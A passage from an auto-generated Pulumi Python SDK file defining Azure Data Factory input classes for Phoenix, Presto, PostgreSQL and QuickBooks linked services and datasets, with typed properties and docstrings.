:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: The password corresponding to the user name.
:param Any port: The TCP port that the Phoenix server uses to listen for client connections. The default value is 8765.
:param Any trusted_cert_path: The full path of the .pem file containing trusted CA certificates for verifying the server when connecting over SSL. This property can only be set when using SSL on self-hosted IR. The default value is the cacerts.pem file installed with the IR.
:param Any use_system_trust_store: Specifies whether to use a CA certificate from the system trust store or from a specified PEM file. The default value is false.
:param Any username: The user name used to connect to the Phoenix server.
"""
pulumi.set(__self__, "authentication_type", authentication_type)
pulumi.set(__self__, "host", host)
pulumi.set(__self__, "type", 'Phoenix')
if allow_host_name_cn_mismatch is not None:
pulumi.set(__self__, "allow_host_name_cn_mismatch", allow_host_name_cn_mismatch)
if allow_self_signed_server_cert is not None:
pulumi.set(__self__, "allow_self_signed_server_cert", allow_self_signed_server_cert)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if enable_ssl is not None:
pulumi.set(__self__, "enable_ssl", enable_ssl)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if http_path is not None:
pulumi.set(__self__, "http_path", http_path)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if port is not None:
pulumi.set(__self__, "port", port)
if trusted_cert_path is not None:
pulumi.set(__self__, "trusted_cert_path", trusted_cert_path)
if use_system_trust_store is not None:
pulumi.set(__self__, "use_system_trust_store", use_system_trust_store)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> pulumi.Input[str]:
"""
The authentication mechanism used to connect to the Phoenix server.
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: pulumi.Input[str]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter
def host(self) -> Any:
"""
The IP address or host name of the Phoenix server. (i.e. 192.168.222.160)
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Any):
pulumi.set(self, "host", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="allowHostNameCNMismatch")
def allow_host_name_cn_mismatch(self) -> Optional[Any]:
"""
Specifies whether to require a CA-issued SSL certificate name to match the host name of the server when connecting over SSL. The default value is false.
"""
return pulumi.get(self, "allow_host_name_cn_mismatch")
@allow_host_name_cn_mismatch.setter
def allow_host_name_cn_mismatch(self, value: Optional[Any]):
pulumi.set(self, "allow_host_name_cn_mismatch", value)
@property
@pulumi.getter(name="allowSelfSignedServerCert")
def allow_self_signed_server_cert(self) -> Optional[Any]:
"""
Specifies whether to allow self-signed certificates from the server. The default value is false.
"""
return pulumi.get(self, "allow_self_signed_server_cert")
@allow_self_signed_server_cert.setter
def allow_self_signed_server_cert(self, value: Optional[Any]):
pulumi.set(self, "allow_self_signed_server_cert", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="enableSsl")
def enable_ssl(self) -> Optional[Any]:
"""
Specifies whether the connections to the server are encrypted using SSL. The default value is false.
"""
return pulumi.get(self, "enable_ssl")
@enable_ssl.setter
def enable_ssl(self, value: Optional[Any]):
pulumi.set(self, "enable_ssl", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter(name="httpPath")
def http_path(self) -> Optional[Any]:
"""
The partial URL corresponding to the Phoenix server. (i.e. /gateway/sandbox/phoenix/version). The default value is hbasephoenix if using WindowsAzureHDInsightService.
"""
return pulumi.get(self, "http_path")
@http_path.setter
def http_path(self, value: Optional[Any]):
pulumi.set(self, "http_path", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The password corresponding to the user name.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def port(self) -> Optional[Any]:
"""
The TCP port that the Phoenix server uses to listen for client connections. The default value is 8765.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[Any]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="trustedCertPath")
def trusted_cert_path(self) -> Optional[Any]:
"""
The full path of the .pem file containing trusted CA certificates for verifying the server when connecting over SSL. This property can only be set when using SSL on self-hosted IR. The default value is the cacerts.pem file installed with the IR.
"""
return pulumi.get(self, "trusted_cert_path")
@trusted_cert_path.setter
def trusted_cert_path(self, value: Optional[Any]):
pulumi.set(self, "trusted_cert_path", value)
@property
@pulumi.getter(name="useSystemTrustStore")
def use_system_trust_store(self) -> Optional[Any]:
"""
Specifies whether to use a CA certificate from the system trust store or from a specified PEM file. The default value is false.
"""
return pulumi.get(self, "use_system_trust_store")
@use_system_trust_store.setter
def use_system_trust_store(self, value: Optional[Any]):
pulumi.set(self, "use_system_trust_store", value)
@property
@pulumi.getter
def username(self) -> Optional[Any]:
"""
The user name used to connect to the Phoenix server.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[Any]):
pulumi.set(self, "username", value)
@pulumi.input_type
class PhoenixObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Phoenix server dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'PhoenixObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class PipelineReferenceArgs:
def __init__(__self__, *,
reference_name: pulumi.Input[str],
type: pulumi.Input[str],
name: Optional[pulumi.Input[str]] = None):
"""
Pipeline reference type.
:param pulumi.Input[str] reference_name: Reference pipeline name.
:param pulumi.Input[str] type: Pipeline reference type.
:param pulumi.Input[str] name: Reference name.
"""
pulumi.set(__self__, "reference_name", reference_name)
pulumi.set(__self__, "type", type)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter(name="referenceName")
def reference_name(self) -> pulumi.Input[str]:
"""
Reference pipeline name.
"""
return pulumi.get(self, "reference_name")
@reference_name.setter
def reference_name(self, value: pulumi.Input[str]):
pulumi.set(self, "reference_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Pipeline reference type.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Reference name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class PostgreSqlLinkedServiceArgs:
def __init__(__self__, *,
connection_string: pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None):
"""
Linked service for PostgreSQL data source.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] connection_string: The connection string.
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
"""
pulumi.set(__self__, "connection_string", connection_string)
pulumi.set(__self__, "type", 'PostgreSql')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter(name="connectionString")
def connection_string(self) -> pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]:
"""
The connection string.
"""
return pulumi.get(self, "connection_string")
@connection_string.setter
def connection_string(self, value: pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]):
pulumi.set(self, "connection_string", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class PrestoLinkedServiceArgs:
def __init__(__self__, *,
authentication_type: pulumi.Input[str],
catalog: Any,
host: Any,
server_version: Any,
type: pulumi.Input[str],
allow_host_name_cn_mismatch: Optional[Any] = None,
allow_self_signed_server_cert: Optional[Any] = None,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
enable_ssl: Optional[Any] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
port: Optional[Any] = None,
time_zone_id: Optional[Any] = None,
trusted_cert_path: Optional[Any] = None,
use_system_trust_store: Optional[Any] = None,
username: Optional[Any] = None):
"""
Presto server linked service.
:param pulumi.Input[str] authentication_type: The authentication mechanism used to connect to the Presto server.
:param Any catalog: The catalog context for all request against the server.
:param Any host: The IP address or host name of the Presto server. (i.e. 192.168.222.160)
:param Any server_version: The version of the Presto server. (i.e. 0.148-t)
:param pulumi.Input[str] type: Type of linked service.
:param Any allow_host_name_cn_mismatch: Specifies whether to require a CA-issued SSL certificate name to match the host name of the server when connecting over SSL. The default value is false.
:param Any allow_self_signed_server_cert: Specifies whether to allow self-signed certificates from the server. The default value is false.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any enable_ssl: Specifies whether the connections to the server are encrypted using SSL. The default value is false.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: The password corresponding to the user name.
:param Any port: The TCP port that the Presto server uses to listen for client connections. The default value is 8080.
:param Any time_zone_id: The local time zone used by the connection. Valid values for this option are specified in the IANA Time Zone Database. The default value is the system time zone.
:param Any trusted_cert_path: The full path of the .pem file containing trusted CA certificates for verifying the server when connecting over SSL. This property can only be set when using SSL on self-hosted IR. The default value is the cacerts.pem file installed with the IR.
:param Any use_system_trust_store: Specifies whether to use a CA certificate from the system trust store or from a specified PEM file. The default value is false.
:param Any username: The user name used to connect to the Presto server.
"""
pulumi.set(__self__, "authentication_type", authentication_type)
pulumi.set(__self__, "catalog", catalog)
pulumi.set(__self__, "host", host)
pulumi.set(__self__, "server_version", server_version)
pulumi.set(__self__, "type", 'Presto')
if allow_host_name_cn_mismatch is not None:
pulumi.set(__self__, "allow_host_name_cn_mismatch", allow_host_name_cn_mismatch)
if allow_self_signed_server_cert is not None:
pulumi.set(__self__, "allow_self_signed_server_cert", allow_self_signed_server_cert)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if enable_ssl is not None:
pulumi.set(__self__, "enable_ssl", enable_ssl)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if port is not None:
pulumi.set(__self__, "port", port)
if time_zone_id is not None:
pulumi.set(__self__, "time_zone_id", time_zone_id)
if trusted_cert_path is not None:
pulumi.set(__self__, "trusted_cert_path", trusted_cert_path)
if use_system_trust_store is not None:
pulumi.set(__self__, "use_system_trust_store", use_system_trust_store)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> pulumi.Input[str]:
"""
The authentication mechanism used to connect to the Presto server.
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: pulumi.Input[str]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter
def catalog(self) -> Any:
"""
The catalog context for all request against the server.
"""
return pulumi.get(self, "catalog")
@catalog.setter
def catalog(self, value: Any):
pulumi.set(self, "catalog", value)
@property
@pulumi.getter
def host(self) -> Any:
"""
The IP address or host name of the Presto server. (i.e. 192.168.222.160)
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Any):
pulumi.set(self, "host", value)
@property
@pulumi.getter(name="serverVersion")
def server_version(self) -> Any:
"""
The version of the Presto server. (i.e. 0.148-t)
"""
return pulumi.get(self, "server_version")
@server_version.setter
def server_version(self, value: Any):
pulumi.set(self, "server_version", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="allowHostNameCNMismatch")
def allow_host_name_cn_mismatch(self) -> Optional[Any]:
"""
Specifies whether to require a CA-issued SSL certificate name to match the host name of the server when connecting over SSL. The default value is false.
"""
return pulumi.get(self, "allow_host_name_cn_mismatch")
@allow_host_name_cn_mismatch.setter
def allow_host_name_cn_mismatch(self, value: Optional[Any]):
pulumi.set(self, "allow_host_name_cn_mismatch", value)
@property
@pulumi.getter(name="allowSelfSignedServerCert")
def allow_self_signed_server_cert(self) -> Optional[Any]:
"""
Specifies whether to allow self-signed certificates from the server. The default value is false.
"""
return pulumi.get(self, "allow_self_signed_server_cert")
@allow_self_signed_server_cert.setter
def allow_self_signed_server_cert(self, value: Optional[Any]):
pulumi.set(self, "allow_self_signed_server_cert", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="enableSsl")
def enable_ssl(self) -> Optional[Any]:
"""
Specifies whether the connections to the server are encrypted using SSL. The default value is false.
"""
return pulumi.get(self, "enable_ssl")
@enable_ssl.setter
def enable_ssl(self, value: Optional[Any]):
pulumi.set(self, "enable_ssl", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The password corresponding to the user name.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def port(self) -> Optional[Any]:
"""
The TCP port that the Presto server uses to listen for client connections. The default value is 8080.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[Any]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="timeZoneID")
def time_zone_id(self) -> Optional[Any]:
"""
The local time zone used by the connection. Valid values for this option are specified in the IANA Time Zone Database. The default value is the system time zone.
"""
return pulumi.get(self, "time_zone_id")
@time_zone_id.setter
def time_zone_id(self, value: Optional[Any]):
pulumi.set(self, "time_zone_id", value)
@property
@pulumi.getter(name="trustedCertPath")
def trusted_cert_path(self) -> Optional[Any]:
"""
The full path of the .pem file containing trusted CA certificates for verifying the server when connecting over SSL. This property can only be set when using SSL on self-hosted IR. The default value is the cacerts.pem file installed with the IR.
"""
return pulumi.get(self, "trusted_cert_path")
@trusted_cert_path.setter
def trusted_cert_path(self, value: Optional[Any]):
pulumi.set(self, "trusted_cert_path", value)
@property
@pulumi.getter(name="useSystemTrustStore")
def use_system_trust_store(self) -> Optional[Any]:
"""
Specifies whether to use a CA certificate from the system trust store or from a specified PEM file. The default value is false.
"""
return pulumi.get(self, "use_system_trust_store")
@use_system_trust_store.setter
def use_system_trust_store(self, value: Optional[Any]):
pulumi.set(self, "use_system_trust_store", value)
@property
@pulumi.getter
def username(self) -> Optional[Any]:
"""
The user name used to connect to the Presto server.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[Any]):
pulumi.set(self, "username", value)
@pulumi.input_type
class PrestoObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Presto server dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'PrestoObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class QuickBooksLinkedServiceArgs:
def __init__(__self__, *,
access_token: pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']],
access_token_secret: pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']],
company_id: Any,
consumer_key: Any,
consumer_secret: pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']],
endpoint: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
use_encrypted_endpoints: Optional[Any] = None):
"""
QuickBooks server linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] access_token: The access token for OAuth 1.0 authentication.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] access_token_secret: The access token secret for OAuth 1.0 authentication.
:param Any company_id: The company ID of the QuickBooks company to authorize.
:param Any consumer_key: The consumer key for OAuth 1.0 authentication.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] consumer_secret: The consumer secret for OAuth 1.0 authentication.
:param Any endpoint: The endpoint of the QuickBooks server. (i.e. quickbooks.api.intuit.com)
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param Any use_encrypted_endpoints: Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
"""
pulumi.set(__self__, "access_token", access_token)
pulumi.set(__self__, "access_token_secret", access_token_secret)
pulumi.set(__self__, "company_id", company_id)
pulumi.set(__self__, "consumer_key", consumer_key)
pulumi.set(__self__, "consumer_secret", consumer_secret)
pulumi.set(__self__, "endpoint", endpoint)
pulumi.set(__self__, "type", 'QuickBooks')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if use_encrypted_endpoints is not None:
pulumi.set(__self__, "use_encrypted_endpoints", use_encrypted_endpoints)
@property
@pulumi.getter(name="accessToken")
def access_token(self) -> pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]:
"""
The access token for OAuth 1.0 authentication.
"""
return pulumi.get(self, "access_token")
@access_token.setter
